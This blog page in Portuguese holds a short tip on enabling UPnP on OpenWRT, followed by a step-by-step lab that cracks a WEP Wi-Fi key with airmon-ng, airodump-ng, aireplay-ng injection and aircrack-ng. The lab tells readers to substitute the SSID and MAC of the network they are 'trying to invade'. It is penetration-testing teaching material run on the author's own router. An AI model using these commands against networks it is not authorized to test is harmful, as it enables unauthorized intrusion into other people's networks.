Téchne Digitus InfoSec Artigos

<índice "[ Hacking ]-[ Redes de Comunicação ]-[ DeepWeb ]-[ Anonimato ]-[ Criptomoedas ]-[ Programação ]-[ InfoSec em Geral ]-[ Off-Topic but Important ]-[ Redes Sociais ]" />

Mostrando postagens com marcador wireless. Mostrar todas as postagens
Mostrando postagens com marcador wireless. Mostrar todas as postagens
Logo Téchne Digitus InfoSec

DICA: Como instalar e ativar UPnP no OpenWRT

OpenWRT - Téchne Digitus

Introdução:

Neste artigo apresentaremos de forma rápida e sintética como implementar e rodar o recurso Universal Plug and Play (ou UPnP) nos firmwares de roteadores OpenWRT.


Definições Básicas:

- UPnP: Recurso que gerencia a divulgação de portas externas de sua rede (geralmente portas que responderão em seu IP externo) e mapeamento das mesmas para portas internas (portas no host dentro de sua rede) que disponibilizarão o serviço desejado.

- OpenWRT: Sistema operacional baseado no kernel Linux, escrito na linguagem Lua, que pode ser instalado em roteadores domésticos. Permitindo um enorme ganho de novos recursos que um firmware padrão de um TP-Link, Linksys entre outros não oferecem. O OpenWRT é um sistema código aberto (opensource) e de livre distribuição (Free software) dentro do modelo GPL.


Passo a passo:

  1. Logue em seu dispositivo via SSH e digite os comandos abaixo na respectiva ordem:
  2. opkg update
  3. opkg install miniupnpd luci-app-upnp
  4. /etc/init.d/miniupnpd enable
  5. /etc/init.d/miniupnpd start
  6. /etc/init.d/firewall restart
E pronto! UPnP instalado e configurado em seu OpenWRT! :)
Logo Téchne Digitus InfoSec

Laboratório: Quebrando uma Chave WEP - Invadindo uma Rede Sem Fio

Quebrando uma Chave WEP

Laboratório TéchneDigitus
Pen Test 01: Quebrando uma Chave WEP
Tipo: Invadindo Redes Wifi

Pré-Requisitos:

Em uma máquina virtual, executar a distribuição LIVE do Kali Linux.
Material Utilizado para Este Lab:

Hardware:
- Notebook (ex.: Processador I5, RAM: 16GB)
- Roteador Wifi (ex.: RE024 da Multilaser)
- Interface de Rede USB (ex.: DWA-125 da D-Link)

Software:
- Sistema Operacional do Notebook: Windows 8.1
- Software de Virtualização: VMware Workstation 11
- Sistema Operacional Virtualizado: Kali Linux 1.1.0 versão Live

Foto do material utilizado neste lab

Procedimento Preparatório:

(considerando que o VMware já está instalado, a ISO do Kali já está disponível no HD do Notebook e no roteador já existe uma rede wifi com chave WEP configurada)
a) Abrir o VMware e criar uma máquina virtual para subir a versão Live do Kali, com 1 Processador, 2 Núcleos, 5 GB de RAM.
b) Plugar a interface de rede wifi usb
c) Inicializar o Kali

Vamos ao Lab...

Laboratório: Quebrando uma Chave WEP

1) Abra o terminal e dê um ifconfig. Verifique a sua interface USB foi encontrada pelo Kali.

Passo 1 - Imagem
2) Digite: airmon-ng start wlan0//Se a sua interface de rede estiver com outro nome, digite-o no lugar de wlan0.

Passo 2 - Imagem

3) No meu exemplo, o output informou que existem 3 processos 3672, 4168 e 4493 que podem atrapalhar o lab. Sendo assim, utilizando os comandos kill 3672, kill 4168 e kill 4493, derrubamos os processos desejados. (Note também que o processo 4493 devia estar amarrado a um dos outros dois processos. Quando matei-os, matei o terceiro junto.)

Passo 3 - Imagem
4) Digite agora airodump-ng -i mon0 e anote o número do canal e, o MACdo AP.

Passo 4 - Imagem
5) Digite agora: airodump-ng --ivs -w dados --channel 13 --bssid C8:3A:35:09:D7:28 mon0

Neste momento, o Kali está coletando e salvando em um arquivo dados-01.ivs, os dados necessários para rodar o algoritmo de quebra da WEP.

Para que ele faça a coleta de dados é necessário que pacotes dessa rede wifi alvo estejam transitando pela rede. Isto é, a rede precisa estar em utilização.

Passo 5 - Imagem

Passo 6) Gerar tráfego para coletar dados...

Formas de Gerar Tráfego:

- Em meu caso, conectei a placa a interface WAN do meu AP num cabo com Internet e conectei outro PC na rede Wifi do Lab para navegar na internet e gerar dados para a coleta. Mas essa forma só é possível devido a nós sermos detentores dos equipamentos nos quais estamos testando.

(A) - Abra um novo terminal e digite aireplay-ng -1 0 -e TechneDigitus_Lab -a C8:3A:35:09:D7:28 -h 00:26:5A:6F:9E:CC mon0

Atenção, substituir:

TechneDigitus_Lab - Pelo SSID (nome da rede wifih) da rede que você está tentando invadir
C8:3A:35:09:D7:28 - Pelo endereço MAC do AP que você está tentando invadir
00:26:5A:6F:9E:CC - Pelo endereço MAC da sua placa de rede usb

Passo 6 - A - Imagem
(B) - Agora digite aireplay-ng -3 -b C8:3A:35:09:D7:28 -h 00:26:5A:6F:9E:CC mon0 e deixe rodando até que você, na outra tela de terminal, consiga obter a chave WEB conforme o próximo passo.

Atenção, substituir:

C8:3A:35:09:D7:28 - Pelo MAC do AP que está tentando invadir
00:26:5A:6F:9E:CC - Pelo MAC da sua placa de rede usb

Passo 6 - B - Imagem
7) Até este momento, devemos ter chego até este passo com 2 janelas de terminais abertas e coma um comando rodando. Uma para o comando do passo 5 e outra para o comando do passo 6B.
Agora, para o passo 7, abriremos uma nova janela de terminal e digitaremos primeiro ls para confirmar o nome do arquivo onde estão sendo gravados os dados capturados pelo passo 5. E, por fim:
aircrack-ng -a 1 dados-01.ivs

Passo 7 - Imagem
E pronto! Conforme podemos ver na imagem, a chave WEP foi descriptografada corretamente e a senha era: [email protected]

---

Para saber mais:

Invadindo Sites com SQLMAP
- 5 Serviços de E-mail Anônimo e/ou Seguro Gratuitos
- Dica: Sessões Ativas no Facebook - Como gerenciá-las
- Remover Telemetria e Mensagem de Instalação do Windows 10 nos Windows 7/8